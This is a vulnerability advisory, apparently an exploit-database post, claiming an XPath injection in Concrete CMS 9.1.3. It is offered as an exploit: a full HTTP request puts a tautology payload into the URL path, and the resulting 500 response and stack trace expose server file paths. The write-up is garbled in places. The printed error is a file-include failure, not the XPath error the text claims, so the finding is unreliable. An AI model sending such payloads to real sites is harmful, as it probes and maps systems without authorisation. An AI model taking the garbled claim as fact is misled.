Authored by nu11secur1ty

Concrete CMS version 9.1.3 suffers from an XPATH injection vulnerability.

## Title: concretecms-9.1.3 Xpath injection
## Author: nu11secur1ty
## Date: 11.28.2022
## Vendor: https://www.concretecms.org/
## Software: https://www.concretecms.org/download
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3

## Description:
The URL path folder `3` appears to be vulnerable to XPath injection attacks.
The test payload 50539478' or 4591=4591-- was submitted in the URL
path folder `3`, and an XPath error message was returned.
The attacker can flood with requests the system by using this
vulnerability to untilted he receives the actual paths of the all
content of this system which content is stored on some internal or
external server.

## STATUS: HIGH Vulnerability

[+] Exploits:
00:
```GET
GET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/js
HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
```

[+] Response:

```HTTP
HTTP/1.1 500 Internal Server Error
Date: Mon, 28 Nov 2022 15:32:22 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 592153

<!DOCTYPE html><!--


WhoopsExceptionErrorException: include(): Failed opening
'C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/application/files/cache/expensivefea6a13c52b4d4725368f24b045ca8438a865804f8fdcb657cd99682e9392753e7d68124ace56635a578007c2573b03d35376a9b3047decfee81596e3895419.php'
for inclusion (include_path='C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/concrete/vendor;C:xamppphpPEAR')
in file C:xampphtdocspwnedhostconcrete-cms-9.1.3concretevendortedivmstashsrcStashDriverFileSystemNativeEncoder.php
on line 26
Stack trace:
1. WhoopsExceptionErrorException->()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretevendortedivmstashsrcStashDriverFileSystemNativeEncoder.php:26
2. include() C:xampphtdocspwnedhostconcrete-cms-9.1.3concretevendortedivmstashsrcStashDriverFileSystemNativeEncoder.php:26
3. StashDriverFileSystemNativeEncoder->deserialize()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretevendortedivmstashsrcStashDriverFileSystem.php:201
4. StashDriverFileSystem->getData()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretevendortedivmstashsrcStashItem.php:631
5. StashItem->getRecord()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretevendortedivmstashsrcStashItem.php:321
6. StashItem->executeGet()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretevendortedivmstashsrcStashItem.php:252
7. StashItem->get()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretevendortedivmstashsrcStashItem.php:346
8. StashItem->isMiss()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretesrcCacheAdapterLaminasCacheDriver.php:67
9. ConcreteCoreCacheAdapterLaminasCacheDriver->internalGetItem()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretevendorlaminaslaminas-cachesrcStorageAdapterAbstractAdapter.php:356
10. LaminasCacheStorageAdapterAbstractAdapter->getItem()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretevendorlaminaslaminas-i18nsrcTranslatorTranslator.php:601
11. LaminasI18nTranslatorTranslator->loadMessages()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretevendorlaminaslaminas-i18nsrcTranslatorTranslator.php:434
12. LaminasI18nTranslatorTranslator->getTranslatedMessage()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretevendorlaminaslaminas-i18nsrcTranslatorTranslator.php:349
13. LaminasI18nTranslatorTranslator->translate()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretesrcLocalizationTranslatorAdapterLaminasTranslatorAdapter.php:69
14. ConcreteCoreLocalizationTranslatorAdapterLaminasTranslatorAdapter->translate()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretebootstraphelpers.php:27
15. t() C:xampphtdocspwnedhostconcrete-cms-9.1.3concreteblockstop_navigation_barview.php:47
16. include() C:xampphtdocspwnedhostconcrete-cms-9.1.3concretesrcBlockViewBlockView.php:267
17. ConcreteCoreBlockViewBlockView->renderViewContents()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretesrcViewAbstractView.php:164
18. ConcreteCoreViewAbstractView->render()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretesrcAreaArea.php:853
19. ConcreteCoreAreaArea->display()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretesrcAreaGlobalArea.php:128
20. ConcreteCoreAreaGlobalArea->display()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretethemesatomikelementsheader.php:11
21. include() C:xampphtdocspwnedhostconcrete-cms-9.1.3concretesrcViewView.php:125
22. ConcreteCoreViewView->inc()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretethemesatomikview.php:4
23. include() C:xampphtdocspwnedhostconcrete-cms-9.1.3concretesrcViewView.php:329
24. ConcreteCoreViewView->renderTemplate()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretesrcViewView.php:291
25. ConcreteCoreViewView->renderViewContents()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretesrcViewAbstractView.php:164
26. ConcreteCoreViewAbstractView->render()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretecontrollerssingle_pagepage_not_found.php:19
27. ConcreteControllerSinglePagePageNotFound->view()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretesrcControllerAbstractController.php:318
28. call_user_func_array()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretesrcControllerAbstractController.php:318
29. ConcreteCoreControllerAbstractController->runAction()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretesrcHttpResponseFactory.php:188
30. ConcreteCoreHttpResponseFactory->controller()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretesrcHttpResponseFactory.php:95
31. ConcreteCoreHttpResponseFactory->notFound()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretesrcHttpResponseFactory.php:390
32. ConcreteCoreHttpResponseFactory->collectionNotFound()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretesrcHttpResponseFactory.php:234
33. ConcreteCoreHttpResponseFactory->collection()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretesrcHttpDefaultDispatcher.php:132
34. ConcreteCoreHttpDefaultDispatcher->handleDispatch()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretesrcHttpDefaultDispatcher.php:60
35. ConcreteCoreHttpDefaultDispatcher->dispatch()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretesrcHttpMiddlewareDispatcherDelegate.php:39
36. ConcreteCoreHttpMiddlewareDispatcherDelegate->next()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretesrcHttpMiddlewareFrameOptionsMiddleware.php:39
37. ConcreteCoreHttpMiddlewareFrameOptionsMiddleware->process()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretesrcHttpMiddlewareMiddlewareDelegate.php:50
38. ConcreteCoreHttpMiddlewareMiddlewareDelegate->next()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretesrcHttpMiddlewareStrictTransportSecurityMiddleware.php:36
39. ConcreteCoreHttpMiddlewareStrictTransportSecurityMiddleware->process()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretesrcHttpMiddlewareMiddlewareDelegate.php:50
40. ConcreteCoreHttpMiddlewareMiddlewareDelegate->next()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretesrcHttpMiddlewareContentSecurityPolicyMiddleware.php:36
41. ConcreteCoreHttpMiddlewareContentSecurityPolicyMiddleware->process()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretesrcHttpMiddlewareMiddlewareDelegate.php:50
42. ConcreteCoreHttpMiddlewareMiddlewareDelegate->next()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretesrcHttpMiddlewareCookieMiddleware.php:35
43. ConcreteCoreHttpMiddlewareCookieMiddleware->process()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretesrcHttpMiddlewareMiddlewareDelegate.php:50
44. ConcreteCoreHttpMiddlewareMiddlewareDelegate->next()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretesrcHttpMiddlewareApplicationMiddleware.php:29
45. ConcreteCoreHttpMiddlewareApplicationMiddleware->process()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretesrcHttpMiddlewareMiddlewareDelegate.php:50
46. ConcreteCoreHttpMiddlewareMiddlewareDelegate->next()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretesrcHttpMiddlewareMiddlewareStack.php:86
47. ConcreteCoreHttpMiddlewareMiddlewareStack->process()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretesrcHttpDefaultServer.php:85
48. ConcreteCoreHttpDefaultServer->handleRequest()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretesrcFoundationRuntimeRunDefaultRunner.php:125
49. ConcreteCoreFoundationRuntimeRunDefaultRunner->run()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretesrcFoundationRuntimeDefaultRuntime.php:102
50. ConcreteCoreFoundationRuntimeDefaultRuntime->run()
C:xampphtdocspwnedhostconcrete-cms-9.1.3concretedispatcher.php:45
51. require() C:xampphtdocspwnedhostconcrete-cms-9.1.3index.php:2


--><html>
<head>
<meta charset="utf-8">
<meta name="robots" content="noindex,nofollow"/>
<meta name="viewport" content="width=device-width,
initial-scale=1, shrink-to-fit=no"/>
<title>Concrete CMS has encountered an issue.</title>

<style>body {
font: 12px "Helvetica Neue", helvetica, arial, sans-serif;
color: #131313;
background: #eeeeee;
padding:0;
margin: 0;
max-height: 100%;

text-rendering: optimizeLegibility;
}
a {
text-decoration: none;
}

.Whoops.container {
position: relative;
z-index: 9999999999;
}

.panel {
overflow-y: scroll;
height: 100%;
position: fixed;
margin: 0;
left: 0;
top: 0;
}

.branding {
position: absolute;
top: 10px;
right: 20px;
color: #777777;
font-size: 10px;
z-index: 100;
}
.branding a {
color: #e95353;
}

header {
color: white;
box-sizing: border-box;
background-color: #2a2a2a;
padding: 35px 40px;
max-height: 180px;
overflow: hidden;
transition: 0.5s;
}

header.header-expand {
max-height: 1000px;
}

.exc-title {
margin: 0;
color: #bebebe;
font-size: 14px;
}
.exc-title-primary, .exc-title-secondary {
color: #e95353;
}

.exc-message {
font-size: 20px;
word-wrap: break-word;
margin: 4px 0 0 0;
color: white;
}
.exc-message span {
display: block;
}
.exc-message-empty-notice {
color: #a29d9d;
font-weight: 300;
}

.......

```


## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3)

## Proof and Exploit:
[href](https://streamable.com/4f60ka)

## Time spent
`03:00:00`